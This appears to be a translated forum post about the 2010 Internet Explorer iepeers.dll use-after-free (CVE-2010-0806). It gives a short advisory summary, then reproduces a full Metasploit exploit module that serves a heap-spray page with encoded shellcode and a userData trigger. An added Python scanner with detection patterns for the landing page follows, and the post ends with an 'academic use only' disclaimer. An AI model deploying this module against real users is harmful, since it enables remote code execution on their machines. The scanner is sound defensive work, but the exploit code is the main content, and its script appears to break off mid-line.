IE 0day vulnerability in iepeers.dll selling briskly on the underground black market

IE 0day vulnerability in iepeers.dll (a favourite for web-based malware, hitting a wide user base)
Published: 2010-3-10
KB981374, orange alert
A new 0day vulnerability has surfaced in the IE browser. It may allow remote code execution: anyone exploiting it can craft a special page and, through e-mail, IM messages or other deception, lure a user into visiting that page so that the vulnerability is triggered.
I. Timeline:
2010-03-10: Microsoft released security advisory KB981374 and said it would release an out-of-band patch for the vulnerability (normally Microsoft starts the out-of-band patch process only for especially serious security vulnerabilities).

II. Summary:
The new IE vulnerability lies in the iepeers.dll component and affects IE6/IE7. It is already being traded on the underground black market; IE8 is not affected.

III. Impact:

1. Mainly affected users:
Windows XP with IE6/IE7

2. Possibly affected users:
Vista with IE7 (Protected Mode reduces the impact)
Windows 2003 with IE7 (the restricted mode reduces the impact)

3. Unaffected users:
IE8 users
Windows 2000 with IE5

Code:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
            'Description'    => %q{
                This module exploits a use-after-free vulnerability within iepeers.dll of
                Microsoft Internet Explorer versions 6 and 7.
                NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [
                        'Trancer <mtrancer[at]gmail.com>'
                        ],
            'Version'        => '$Revision:$',
            'References'     =>
                [
                    [ 'CVE', '2010-0806' ],
                    [ 'OSVDB', '62810' ],
                    [ 'BID', '38615' ],
                    [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
                    [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00\x09\x0a\x0d'\\",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
                ],
            'DisclosureDate' => 'Mar 09 2010',
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)
        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)

        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

        # Set the return address / nops
        ret       = Rex::Text.to_unescape([target.ret].pack('V'))

        # Randomize the javascript variable names
        j_shellcode  = rand_text_alpha(rand(100) + 1)
        j_nops       = rand_text_alpha(rand(100) + 1)
        j_slackspace = rand_text_alpha(rand(100) + 1)
        j_fillblock  = rand_text_alpha(rand(100) + 1)
        j_memory     = rand_text_alpha(rand(100) + 1)
        j_counter    = rand_text_alpha(rand(30) + 2)
        j_ret        = rand_text_alpha(rand(100) + 1)
        j_array      = rand_text_alpha(rand(100) + 1)
        j_function1  = rand_text_alpha(rand(100) + 1)
        j_function2  = rand_text_alpha(rand(100) + 1)
        j_object     = rand_text_alpha(rand(100) + 1)
        j_id         = rand_text_alpha(rand(100) + 1)

        # Build out the message
        html = %Q|<html><body>
<button id='#{j_id}' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
    var #{j_shellcode} = unescape('#{shellcode}');
    #{j_memory} = new Array();
    var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
    var #{j_nops} = unescape('#{ret}');
    while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
    var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
    delete #{j_nops};
    for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
        #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
    }
}
function #{j_function2}(){
    #{j_function1}();
    var #{j_object} = document.createElement('body');
    #{j_object}.addBehavior('#default#userData');
    document.appendChild(#{j_object});
    try {
        for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
            #{j_object}.setAttribute('s',window);
        }
    } catch(e){ }
    window.status+='';
}
document.getElementById('#{j_id}').
</script></body></html>|

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html' })

        # Handle the payload
        handler(cli)
    end
end
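Added here as a defender's example, not code from the original post or the Metasploit module: a small Python scanner that flags HTML combining the landing-page traits the module above generates (a 0x0C0C0C0C heap spray, addBehavior('#default#userData') and setAttribute(..., window)). The indicator names and both sample pages are constructed for this example.

```python
import re

# Added example: scores HTML for the traits of the iepeers.dll (CVE-2010-0806)
# landing page. Indicator names and the sample pages are constructed here.
INDICATORS = {
    # unescape('%u0c0c%u0c0c') is the little-endian form of the 0x0C0C0C0C target address
    "spray_addr_0c0c0c0c": re.compile(r"unescape\(\s*['\"](?:%u0c0c){1,2}['\"]\s*\)", re.I),
    # a long %uXXXX blob is the usual unescape'd shellcode carrier
    "long_unescape_blob": re.compile(r"unescape\(\s*['\"](?:%u[0-9a-f]{4}){40,}['\"]\s*\)", re.I),
    # a counted loop that stores a concatenated block into an array element
    "spray_loop": re.compile(r"for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*\d{2,}\s*;[^}]*\w+\[\w+\]\s*=", re.I),
    "userdata_behavior": re.compile(r"addBehavior\(\s*['\"]#default#userData['\"]\s*\)", re.I),
    "setattribute_window": re.compile(r"\.setAttribute\(\s*['\"][^'\"]+['\"]\s*,\s*window\s*\)", re.I),
}

def scan_html(html):
    """Return (verdict, matched indicator names). 'exploit_pattern' needs the userData
    trigger plus a spray trait; a page that only uses #default#userData is 'review'."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    spray = {"spray_addr_0c0c0c0c", "long_unescape_blob", "spray_loop"} & set(hits)
    trigger = {"userdata_behavior", "setattribute_window"} & set(hits)
    if trigger and spray:
        return "exploit_pattern", hits
    if trigger or len(spray) >= 2:
        return "review", hits
    return "clean", hits

# Constructed sample: the module's page with fixed names, a dummy shellcode and no trigger call
SUSPECT_PAGE = """<html><body><button id='b' style='display:none'></button><script>
function f1(){
    var sc = unescape('%u9090%u9090');
    var nops = unescape('%u0c0c%u0c0c');
    while(nops.length<0x40000) { nops+=nops; }
    mem = new Array();
    for(i=0; i<270; i++) { mem[i] = nops + nops + sc; }
}
function f2(){
    f1();
    var o = document.createElement('body');
    o.addBehavior('#default#userData');
    try { for (i=0; i<10; i++) { o.setAttribute('s',window); } } catch(e){ }
}
</script></body></html>"""

# Constructed sample: legitimate use of the userData behavior, no spray
BENIGN_PAGE = """<html><body><div id='store'></div><script>
var s = document.getElementById('store'); s.addBehavior('#default#userData');
s.setAttribute('theme', 'dark'); s.save('prefs');
</script></body></html>"""
```

The benign page shows why the verdict needs both halves: #default#userData was a legitimate IE persistence feature, so it alone should only raise a review flag.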

PS: The reason for releasing the code is that the patch has been published. Please apply it promptly, or you are in for a bad time!

Friendly reminder: this code is dangerous; use it with caution!

Solemn declaration: I provide this bug material for academic exchange only and accept no legal responsibility for anything arising from it. Please take note!